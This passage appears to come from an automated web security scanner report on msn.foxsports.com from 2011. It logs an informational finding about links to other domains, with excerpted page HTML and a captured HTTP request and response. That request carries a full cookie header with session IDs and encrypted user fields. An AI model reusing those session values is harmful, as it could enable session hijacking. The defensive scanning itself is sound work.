...[SNIP]...
<a href='http://msn.foxsports.com/video/MLB?vid=4c0c6cac-d496-48ce-988a-92aec83dcb3f&amp;from=foxsports/mlb/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=4c0c6cac-d496-48ce-988a-92aec83dcb3f&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MLB?vid=dc932b39-3e36-45d0-ad4c-2698ef92d0f5&amp;from=foxsports/mlb/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=dc932b39-3e36-45d0-ad4c-2698ef92d0f5&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MLB?vid=89116f56-239a-418d-ac74-f8ca6c430be0&amp;from=foxsports/mlb/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=89116f56-239a-418d-ac74-f8ca6c430be0&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/MLB?vid=4451c7ef-2554-469a-b7df-a89383f35fe3&amp;from=foxsports/mlb/stories'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=4451c7ef-2554-469a-b7df-a89383f35fe3&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<span class="piped">|


<a href="http://www.foxsportsohio.com/01/07/11/Jocketty-knows-Renteria-well/landing.html?blockID=387013&amp;feedID=3724" title="Known commodity">
Known commodity
</a>
...[SNIP]...
</span>
   

    <a href="http://www.foxsportsohio.com/01/07/11/Jocketty-knows-Renteria-well/landing.html?blockID=387013&amp;feedID=3724" title="Known commodity"></a>
...[SNIP]...


   
<a href="http://mlbbuzz.yardbarker.com/blog/mlbbuzz/soriano_is_no_1_free_agent_available_who_wants_him/3924488" title="Buzz: Soriano is best free agent left, but who wants him?">Buzz: Soriano is best free agent left, but who wants him?</a>
...[SNIP]...


   
        <a href="http://mlbbuzz.yardbarker.com/blog/mlbbuzz/soriano_is_no_1_free_agent_available_who_wants_him/3924488" title="Buzz: Soriano is best free agent left, but who wants him?"></a>
...[SNIP]...
<div class="fs-page-banner-sliver">

   
           <a href="http://foxsports.seenon.com/?v=fox-sports_mlb&amp;ecid=PRF-SM-510012&amp;PA=FoxSportsWSChampsGiants_300X90 "><img src="http://static.foxsports.com/content/fscom/img/2010/11/01/world_series_300x90_01_20101101222146_0_0.JPG" alt=""/>
...[SNIP]...
<div class="body">
<a title="A year of turbulence in air travel" class="main-story" href="http://www.bing.com/travel/content/search?q=The+Middle+Seat%3a+A+Year+of+Turbulence+in+Air+Travel&cid=msn1174923&form=TRVCON&ocid=xnetr4-1"><img alt="A Transportation Security Administration officer pats down Elliott Erwitt as he works his way through security at San Francisco International Airport in San Francisco, c. Jeff Chiu - AP" border="0" height="90" width="90" src="http://blstb.msn.com/i/AD/F29127CDF33B4F7F0435CFFA510E7.jpg"><span class="copy">
...[SNIP]...
<li>
<a title="Elizabeth Edwards' will" href="http://specials.msn.com/A-List/Lifestyle/Nothing-for-John-Edwards.aspx?cp-documentid=27145166&ocid=xnetr4-2">Elizabeth Edwards' will</a>
...[SNIP]...
<li>
<a title="'Lost' numbers lucky in Mega Millions" href="http://www.bing.com/search?q=%22lost%22+numbers+mega+millions+lottery&form=msnhpm&ocid=xnetr4-3">'Lost' numbers lucky in Mega Millions</a>
...[SNIP]...
<li>
<a title="Video: Top 5 must-sees at CES" href="http://www.bing.com/videos/watch/video/top-5-at-ces/q9v2d33x?q=Consumer+Electronics+Show&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007&ocid=xnetr4-4">Video: Top 5 must-sees at CES</a>
...[SNIP]...
</div>


<a href="http://g.msn.com/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
<li>
                       <a href="http://www.foxcareers.com" title="Jobs">Jobs</a></li>
                   <li>
                       <a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li>
                       <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li>
                       <a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.msn.com/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.msn.com/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.msn.com/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.15. http://msn.foxsports.com/morenews  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /morenews

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /morenews?categoryId=0 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 214301
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=12
Date: Sat, 08 Jan 2011 01:20:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">